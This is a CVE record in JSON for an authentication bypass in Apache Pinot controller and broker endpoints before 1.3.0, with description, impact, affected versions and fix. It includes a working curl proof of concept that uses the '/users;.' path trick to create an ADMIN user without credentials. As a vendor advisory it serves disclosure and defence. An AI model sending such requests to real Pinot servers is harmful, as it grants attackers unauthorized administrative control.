{
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09"
      },
      "title": "Authentication bypass issue. If the path does not contain / and contain . authentication is not required",
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "CWE-288 Authentication Bypass Using an Alternate Path or Channel",
              "lang": "en",
              "cweId": "CWE-288",
              "type": "CWE"
            }
          ]
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "affected": [
        {
          "vendor": "Apache Software Foundation",
          "product": "Apache Pinot",
          "packageName": "org.apache.pinot.controller.api",
          "versions": [
            {
              "status": "affected",
              "version": "0",
              "lessThan": "1.3",
              "versionType": "maven"
            }
          ],
          "defaultStatus": "unaffected"
        }
      ],
      "descriptions": [
        {
          "value": "Authentication Bypass Vulnerability in Apache Pinot (CVE-2024-56325)\n\n\n\n\n\n\nApache Pinot versions prior to 1.3.0 contain an authentication bypass vulnerability affecting REST endpoints in the Controller and Broker components.\n\n\n\n\n\n\n\n\nDescription\n\n\n\n\n\n\nThe vulnerability is caused by improper handling of HTTP request paths containing matrix parameters (;) combined with dot (.) characters. Under certain crafted path conditions (for example, /users;.), the request could be incorrectly classified as an unprotected resource. As a result, authentication checks were skipped.\n\n\n\n\n\n\nThis may allow an unauthenticated attacker to invoke protected administrative APIs if the Pinot Controller or Broker endpoints are accessible.\n\n\n\n\n\n\nThis issue is classified as:\n\n\n\n\n  *  \nCWE-288: Authentication Bypass Using an Alternate Path or Channel\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nExample\n\n\n\n\n\n\nExpected behavior (authentication enforced):\n\n\n\n\ncurl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' \\\n  http://{server_ip}:9000/users\n\n\n\n\nResponse:\n\n\n\n\n{\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\n\n\nCrafted request triggering bypass (pre-1.3.0 only):\n\n\n\n\ncurl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' \\\n  http://{server_ip}:9000/users;.\n\n\n\n\nIn vulnerable versions, this request could bypass authentication and succeed.\n\n\n\n\n\n\n\n\nImpact\n\n\n\n\n\n\nIf exploited, an unauthenticated attacker may gain administrative access, including the ability to create users and modify cluster configuration.\n\n\n\n\n\n\nThe vulnerability is only exploitable if:\n\n\n\n\n  *  \nAuthentication is enabled, and\n\n\n\n  *  \nController or Broker APIs are reachable by the attacker.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAffected Versions\n\n\n\n\n  *  \nApache Pinot versions earlier than 1.3.0\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nFixed Version\n\n\n\n\n  *  \nApache Pinot 1.3.0\n\n\n\n\n\n\n\n\n\n\n\n\nThe fix ensures matrix parameters are stripped from request paths before evaluating authentication requirements.\n\n\n\n\n\n\nUsers are strongly encouraged to upgrade to version 1.3.0 or later.",
          "lang": "en",
          "supportingMedia": [
            {
              "type": "text/html",
              "base64": false,
              "value": "\n\n\n\n\n\n<p><b>Authentication Bypass Vulnerability in Apache Pinot (CVE-2024-56325)</b></p>\n<p><br></p>\n<p>Apache Pinot versions prior to <b>1.3.0</b> contain an authentication bypass vulnerability affecting REST endpoints in the Controller and Broker components.</p>\n<p><br></p>\n<p></p><h3><b>Description</b></h3><p></p>\n<p><br></p>\n<p>The vulnerability is caused by improper handling of HTTP request paths containing <b>matrix parameters (;) combined with dot (.) characters</b>. Under certain crafted path conditions (for example, /users;.), the request could be incorrectly classified as an unprotected resource. As a result, authentication checks were skipped.</p>\n<p><br></p>\n<p>This may allow an unauthenticated attacker to invoke protected administrative APIs if the Pinot Controller or Broker endpoints are accessible.</p>\n<p><br></p>\n<p>This issue is classified as:</p>\n<p></p><ul><li>\n<p><b>CWE-288: Authentication Bypass Using an Alternate Path or Channel</b></p>\n</li></ul><p></p>\n<p><br></p>\n<p></p><h3><b>Example</b></h3><p></p>\n<p><br></p>\n<p><b>Expected behavior (authentication enforced):</b></p>\n\n\n<pre><code>curl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' \\\n  http://{server_ip}:9000/users</code></pre>\n\n\n<p>Response:</p>\n\n\n<pre><code>{\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}</code></pre>\n\n\n<p><b>Crafted request triggering bypass (pre-1.3.0 only):</b></p>\n\n\n<pre><code>curl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' \\\n  http://{server_ip}:9000/users;.</code></pre>\n\n\n<p>In vulnerable versions, this request could bypass authentication and succeed.</p>\n<p><br></p>\n<p></p><h3><b>Impact</b></h3><p></p>\n<p><br></p>\n<p>If exploited, an unauthenticated attacker may gain administrative access, including the ability to create users and modify cluster configuration.</p>\n<p><br></p>\n<p>The vulnerability is only exploitable if:</p>\n<p></p><ul><li>\n<p>Authentication is enabled, and</p>\n</li><li>\n<p>Controller or Broker APIs are reachable by the attacker.</p>\n</li></ul><p></p>\n<p><br></p>\n<p></p><h3><b>Affected Versions</b></h3><p></p>\n<p></p><ul><li>\n<p>Apache Pinot versions <b>earlier than 1.3.0</b></p>\n</li></ul><p></p>\n<p><br></p>\n<p></p><h3><b>Fixed Version</b></h3><p></p>\n<p></p><ul><li>\n<p>Apache Pinot <b>1.3.0</b></p>\n</li></ul><p></p>\n<p><br></p>\n<p>The fix ensures matrix parameters are stripped from request paths before evaluating authentication requirements.</p>\n<p><br></p>\nUsers are strongly encouraged to upgrade to version 1.3.0 or later.<p></p>\n\n\n"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v",
          "tags": [
            "vendor-advisory"
          ]
        }
      ],
      "metrics": [
        {
          "other": {
            "type": "Textual description of severity",
            "content": {
              "text": "critical"
            }
          }
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "75Acol at Huawei",
          "type": "finder"
        },
        {
          "lang": "en",
          "value": "fcgboy at Huawei",
          "type": "finder"
        },
        {
          "lang": "en",
          "value": "wk2025 at Huawei",
          "type": "finder"
        },
        {
          "lang": "en",
          "value": "leo at Huawei",
          "type": "finder"
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "cveId": "CVE-2024-56325",
    "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
    "serial": 1,
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}